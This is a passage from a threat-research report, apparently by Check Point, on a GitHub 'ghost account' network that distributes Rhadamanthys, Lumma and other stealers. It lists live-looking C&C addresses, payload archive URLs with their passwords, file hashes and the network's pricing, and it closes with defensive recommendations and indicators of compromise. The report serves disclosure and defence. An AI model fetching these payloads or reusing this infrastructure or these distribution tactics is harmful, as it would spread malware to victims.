Loader-Installers\\DriverUP.dll 060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\\Loader Installer.exe 802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\\CFG.ini B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\\DriverUP.dll 060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\\Loader Installer.exe 802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\\CFG.ini B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\\DriverUP.dll 060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\\Loader Installer.exe The downloader makes a GET request that appears to register the bot’s IP address and generate campaign statistics: 147.45.44.73:1445/bibika1337?reason= . When we visit the link, we see a page in Russian-language that mentions the number of launched downloaders (the last stats before clean action). Russian English No Запущено всего Total launched 1123 Запущено за две недели Launched in two weeks 1061 Запущено за неделю Launched in a week 621 Запущено за 2дня Launched in 2 days 131 Запущено за день Launched in a day 44 In just 2 weeks, Rhadamanthys infected more than 1050 victims while being distributed via the Stargazers Ghost Network. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 33 of 45 Figure 25 – Campaign statistics. Following two more GET requests, the victim downloads two password-protected archives: 1. 147.45.44.73:1488/moa/Tricky2.rar 2. 89.23.98.116:1444/Tricky.rar Figure 26 – Multiple password-protected archives are stored inside those directories. Figure 27 – Two archives are stored, the last one from 2024-06-09. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 34 of 45 Both of the archives are decrypted using the same password, yanabibika . Figure 28 – Password-protected archive unpacking. 938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\\withya_MrAnon.cmd 64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\\prezi-desktop-6-26-0.exe 938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\\withya_MrAnon.cmd 64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\\prezi-desktop-6-26-0.exe 938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\\withya_MrAnon.cmd 64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\\prezi-desktop-6-26-0.exe The executable inside the archive is the GO loader for Rhadamanthys, which is injected into C:\\Windows\\BitLockerDiscoveryVolumeContents\\BitLockerToGo.exe and later communicates with its C&C, 147.78.103.199:2529 . The GitHub repositories for the Atlantida campaign and the Rhadamanthys were created around the same time. The earliest Rhadamanthys repository was created on 2024-05-30T18:51:26Z . The network operator employed around 120 GitHub accounts for this campaign. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 35 of 45 Figure 29 – Accounts per Action. Another interesting discovery occurred when we further examined the commits and forked accounts. On 2021-02- 11T02:41:40Z (not a typo, it is indeed 2021), the repository V-arc/Silverfish ( 53041402+V-arc@users.noreply.github.com/71246462@qq.com ) was created and, between February and August 2021, was forked by 25 other accounts. On 2024-06-02T09:06:59Z , V-arc updated the original README.md file now containing the phishing link distributing Rhadamanthys. Two of the 25 forked repositories applied commit from the original repository. The reason for choosing to “infect” that specific repository is due to the fact that it is the most popular one owned by this account. Figure 30 – Updating last commit from 2021-02-13T15:41:31Z.  V-arc GitHub account was created on 2019-07-18T09:42:29Z but was updated on 2024-05-31T11:14:43Z . We aren’t sure exactly what kind of update occurred, but possibly generated a new GPG key. As expected, the account also has a repository with the pattern # V-arc1\n1 created on 2024-06-08T19:03:31Z . The initial commit on the malicious repository was possibly made using the Web interface on 2021-02-11T02:41:40Z in the timezone UTC+8 . The rest of the commits around the same time (in day(s)) possibly happened from a local environment on 2021-02-11T02:44:59Z , 2021- 02-11T06:25:26Z , and the last legitimate commit on 2021-02-13T15:41:31Z . While all the “initial” commits happened in the timezone UTC+8 , the last malicious commit in 2024 occurred on UTC+3 . We consider it highly unlikely that the repository started as malicious and only started pushing malware 3 years later. Possibly, the account was compromised and then was included in the Stargazers Ghost Network. With that bit of information, we consider the ~1100 accounts/repositories with the pattern # {username}1\n1 a test of compromised accounts credentials/rights. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 36 of 45 According to the campaign statistics, 687 of the activities on malicious repositories distributing the GO downloader occurred on May 31, 2024, indicating the campaign’s start date. Figure 31 – Rhadamanthys campaign, GitHub accounts activities. The authors of the README.md files that were forked by the rest of the accounts: Commit Date Commit Author Commit Email Repository Owner No Maliciou Reposito 2024-05- 29T20:55:01Z GMT+0 batuhanodbs 104384818+batuhanodbs@users.noreply.github.com batuhanodbs 1 2024-05- 29T21:00:55Z GMT+0 HeangHorn 75545632+HeangHorn@users.noreply.github.com HeangHorn 1 2024-05- 29T21:09:37Z GMT+0 dblancolascarez 107002366+dblancolascarez@users.noreply.github.com dblancolascarez 1 2024-05- 29T21:15:46Z GMT+0 yessine-agrebi 59874615+yessine-agrebi@users.noreply.github.com yessine-agrebi 1 2024-05- 30T11:59:15Z GMT+0 SpacyXyt 80075528+SpacyXyt@users.noreply.github.com SpacyXyt 2 https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 37 of 45 Commit Date Commit Author Commit Email Repository Owner No Maliciou Reposito 2024-05- 30T18:51:26Z GMT+0 Essence-Of-Slimez-37120878149+Essence-Of-Slimez-37@users.noreply.github.comEssence-Of-Slimez-37 27 2024-05- 30T19:40:27Z GMT+0 Major2000 majormadobe@gmail.com Major2000 2 2024-05- 31T13:48:49Z GMT+0 Molano11 124221765+Molano11@users.noreply.github.com Molano11 2 2024-05- 31T15:21:05Z GMT+0 Danms661 dnsrm9787@gmail.com Danms661 3 2024-05- 31T21:50:08Z GMT+0 blackvn05 62129353+blackvn05@users.noreply.github.com blackvn05 1 2024-06- 01T12:55:33Z GMT+0 ySunSh1ne 113144625+ySunSh1ne@users.noreply.github.com ySunSh1ne 1 2024-06- 01T12:56:02Z GMT+0 AmerHashima 43539190+AmerHashima@users.noreply.github.com AmerHashima 1 2024-06- 01T12:56:45Z GMT+0 jgprimaki 93926139+jgprimaki@users.noreply.github.com jgprimaki 1 2024-06- 02T09:06:59Z GMT+3 V-arc 53041402+V-arc@users.noreply.github.com V-arc 1 Stargazer Goblin and Malware Distributed via Network Comparing the two campaigns, the difference in links and modus operandi, despite both being “starred” and “forked” by the same accounts, leads us to believe that the Stargazers Ghost Network functions as a Malware/Link Distribution as a Service (DaaS). In this model, threat actors share their malicious links or malware, possibly at different prices, and distribute them through these malicious GitHub repositories and “legitimized” by the Stargazer accounts. Check Point Research is tracking the threat actor/group behind this service as Stargazer Goblin. This group provides, operates, and maintains the Stargazers Ghost Network, which distributes malicious links or malware via their Ghost GitHub accounts. Malware families distributed via the network include: Atlantida Stealer Rhadamanthys https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 38 of 45 Lumma Stealer RedLine RisePro Since the beginning of June 2024, we observed 211 unique still active repositories pushing malicious links, compared to 135 active from May. Since May 2024, GitHub has taken down approximately 1559 repositories and their related GitHub accounts. Figure 32 – Active repositories per last update date.  From the accounts we have been tracking, 8 different accounts have bestowed 530 stars to repositories. While we do not have access to all the starred repositories as old ones were taken down, all of them were updated around the same date 2024-05-31T19:00:32Z : @Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi @Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi @Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi While none of the accounts we mention could provide us with information on when the network was created, there is an account whose name indicates its purpose as part of the network. @StarGhostSG , with 253 starred repositories, was created on 2022-08-31T00:05:25Z . This is the creation date, but the network could have been either under development or already operating on a smaller scale during that time. Dark-Web Forums While searching Dark Web forums, we found an advertisement from July 8, 2023, promoting the described network. The advertisement banner is written in both English and Russian. According to the post, this account offers services for starring, following, forking, and watching GitHub accounts and repositories, as well as fulfilling any other requested actions on GitHub. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 39 of 45 Figure 33 – The first advertisement was on 2023-07-08. The prices vary depending on the services provided. For example, starring a repository with 100 accounts costs $10, with a rate of 10 stars per USD. Providing a trusted account with an “aged” repository costs $2. Discounts are available for purchases over $500. Figure 34 – Service details and prices. Based on this information and the number of repositories and actions that occurred from mid-May to mid-June 2024, Check Point Research calculated Stargazer Goblin‘s potential profit to be approximately $8,000. We believe that more actions and repositories took place during this time, making the calculated profit just a fraction of the actual profit. Considering that Stargazers Ghost Network has operated publicly since July 2023 and likely on a smaller scale since August 2022, we estimate the total profit to be approximately $100,000 for the entire lifespan of Stargazers Ghost Network. GitHub could probably produce a more accurate estimation of the profit, as they have more insights into the actions that occurred on banned accounts and repositories. Past, Present, and Future Ghosts Networks Check Point Research, based on intelligence, considered it highly probable that GitHub Ghost accounts are only one part of the grand picture, with other Ghost accounts operating on different platforms as an integral part of an even larger Distribution as a Service universe. This theory gained support when we discovered a GitHub repository sharing a link to an https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 40 of 45 unlisted YouTube video. The video instructs potential victims how to download and install a supposedly “free” version of Adobe Photoshop. Figure 35 – GitHub account with download and YouTube links.  In the YouTube video, the threat actor is seen downloading a password-protected archive from clouds-folder[.]com , extracting it using the password 2424 , and then proceeding to execute the installer (Lumma Stealer). During our careful examination of the video, we identified the full path to the dist folder, C:\\Users\\Peresvet\\DevelNextProjects\\test\\build\\dist . Figure 36 – Ghost YouTube Account and malicious unlisted Video. The YouTube Ghost account also comments on its own video. Additionally, we observed the actual owner of the compromised GitHub account, @ANGEOM21 , replying to one of the Ghost’s comments. This interaction validates our previous assumption that many of the accounts in the Stargazers Ghost Network are compromised. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 41 of 45 Figure 37 – YouTube Ghost account’s video comment section. We believe that Stargazer Goblin created a universe of Ghost accounts operating across various platforms such as GitHub, Twitter, YouTube, Discord, Instagram, Facebook, and many others. This further leads us to believe that the Atlantida Stealer campaigns, which specifically targeted social media-oriented users, could have been performed by Stargazer Goblin to obtain accounts for the Ghost networks. Similar to GitHub, other platforms can be utilized to legitimize malicious phishing and distribute links and malware to victims through posts, repositories, videos, tweets, and channels, depending on the features each platform offers. Future Ghost accounts could potentially utilize Artificial Intelligence (AI) models to generate more targeted and diverse content, from text to images and videos. By considering targeted users’ replies, these AI-driven accounts could promote phishing material not only through standardized templates but also through customized responses tailored to real users’ needs and interactions. A new era of malware distribution is here, where we expect these types of operations to occur more frequently, making it increasingly difficult to distinguish legitimate content from malicious material. Conclusion Stargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection as GitHub is considered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers any damage when GitHub disrupts their network. Utilizing multiple accounts and profiles performing different activities from starring to hosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost Network to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of the whole operation is disrupted instead of all the involved accounts. The campaigns performed by the Stargazers Ghost Network and malware distributed via this service are extremely successful. In a short period of time, thousands of victims installed software from what appears to be a legitimate repository without suspecting any malicious intent. The heavily victim-oriented phishing templates allow threat actors to infect victims with specific profiles and online accounts, making the infections even more valuable. The actual number of accounts performing various network operations is unclear, as the network is constantly evolving. Our latest calculations suggest there are more than 3,000 Ghost accounts. Considering a campaign of approximately 30 repositories utilizing around 380 Ghost accounts, the total number may be even higher. While GitHub does ban suspect accounts in many cases, the operations run uninterrupted for a long time before those measures are taken. Some of the Ghost accounts appear to have been created by the operators, while others seem to be compromised “normal” GitHub accounts. This makes GitHub credentials valuable in underground marketplaces, as the network also incorporates such accounts. The addition of compromised accounts into the network makes it challenging to estimate when Stargazer Goblin started their malicious activities. As it is difficult to easily separate clear malicious activities from normal users ones. However, based on some core accounts, we consider August 2022 to be when the network development began and/or was https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 42 of 45 working on a smaller scale. The first public advertisement of Stargazers Ghost Network occurred the following year, on July 8, 2023. The total estimated profit for Stargazer Goblin is estimated at $100,000. We are entering a new era of malware distribution, where ghost accounts organically promote and distribute malicious links across various platforms. Future ghost accounts powered by artificial intelligence could launch even more targeted campaigns, making it increasingly difficult to distinguish between legitimate content and malicious material. Recommendations GitHub has been long used for malicious activities, though the introduction of this network in the attack makes it fairly difficult for normal users to detect suspicious repositories. To mitigate the risks of being affected by such threats, it is essential to: 1. Keep operating systems and applications updated through timely patches and other means. 2. Be cautious of unexpected emails/messages with links, especially from unknown senders. 3. Enhance cybersecurity awareness among employees. 4. Consult security specialists for any doubts or uncertainties. Protection Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect its customers against this type of attack and malware families described in this report. InfoStealer.Win.Atlantida.* Trojan.WIN32.AtlantidaStealer.A Trojan.WIN32.AtlantidaStealer.B InfoStealer.Wins.Lumma.ta.S InfoStealer.Wins.Lumma.ta.T InfoStealer.Wins.Lumma.ta.U InfoStealer.Win.Lumma.N InfoStealer.Win.Lumma.O Injector.Win.RunPE.C Loader.Wins.GoBitLoader.A Trojan.Wins.Imphash.taim.LV Trojan.Win32.RedLine Stealer.TC.6a9fRQRh InfoStealer.Wins.Redline.ta.BY IOCs Description Value Atlantida – HTA 2B6C8AA2AC917D978DFEC53CEF70EACA36764A93D01D93786CC0D84DA47CE8E6 Atlantida – MHTML 385EBE3D5BD22B6A5AE6314F33A7FA6AA24814005284C79EDAA5BDCF98E28492 Atlantida – Powershell 2EBF051F6A61FA825C684F1D640BFB3BD79ADD0AFCFF698660F83F22E6544CBA Atlantida – .NET Injector AB59A8412E4F8BF3A7E20CD656EDACF72E484246DFB6B7766D467C2A1E4CDAB0 https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 43 of 45 Description Value Atlantida – C&C 185.172.128[.]95 Rhadamanthys – GO downloader 060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Rhadamanthys – GO downloader – C&Cs 147.45.44[.]73[:]1488 89.23.98[.]116[:]1444 Rhadamanthys – GO Loader 64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Rhadamanthys – C&C 147.78.103[.]199[:]2529 Lumma Stealer 148C456E83E746A63E54EC5ABDA801731C42F3778E8EB0BF5A5C731B9A48C45D 2F5624DCDA1D58A45491028ACC63FF3F1F89F564015813C52EEBD80F51220383 98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388 A484FA09BE45608E23D8E67CD28675FA3E3C4111AF396501385256CE34FF1D95 Lumma – C&Cs hxxps://considerrycurrentyws[.]shop hxxps://deprivedrinkyfaiir[.]shop hxxps://detailbaconroollyws[.]shop hxxps://distincttangyflippan[.]shop hxxps://greentastellesqwm[.]shop hxxps://horsedwollfedrwos[.]shop hxxps://innerverdanytiresw[.]shop hxxps://lamentablegapingkwaq[.]shop hxxps://macabrecondfucews[.]shop hxxps://messtimetabledkolvk[.]shop hxxps://patternapplauderw[.]shop hxxps://relaxtionflouwerwi[.]shop hxxps://sideindexfollowragelrew[.]pw hxxps://slamcopynammeks[.]shop hxxps://standingcomperewhitwo[.]shop hxxps://stickyyummyskiwffe[.]shop hxxps://sturdyregularrmsnhw[.]shop hxxps://understanndtytonyguw[.]shop hxxps://vivaciousdqugilew[.]shop RedLine Stealer 8D8D7EB1180C13ED629DCEAC6C399C656692A6476C49047E0822BEC6156A253A RedLine – C&C 147.45.47[.]64[:]11837 BLOGS AND PUBLICATIONS https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 44 of 45 Check Point Research Publications Global Cyber Attack Reports Threat Research February 17, 2020 “The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign We value your privacy! BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies. Source: https://research.checkpoint.com/2024/stargazers-ghost-network/ https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 45 of 45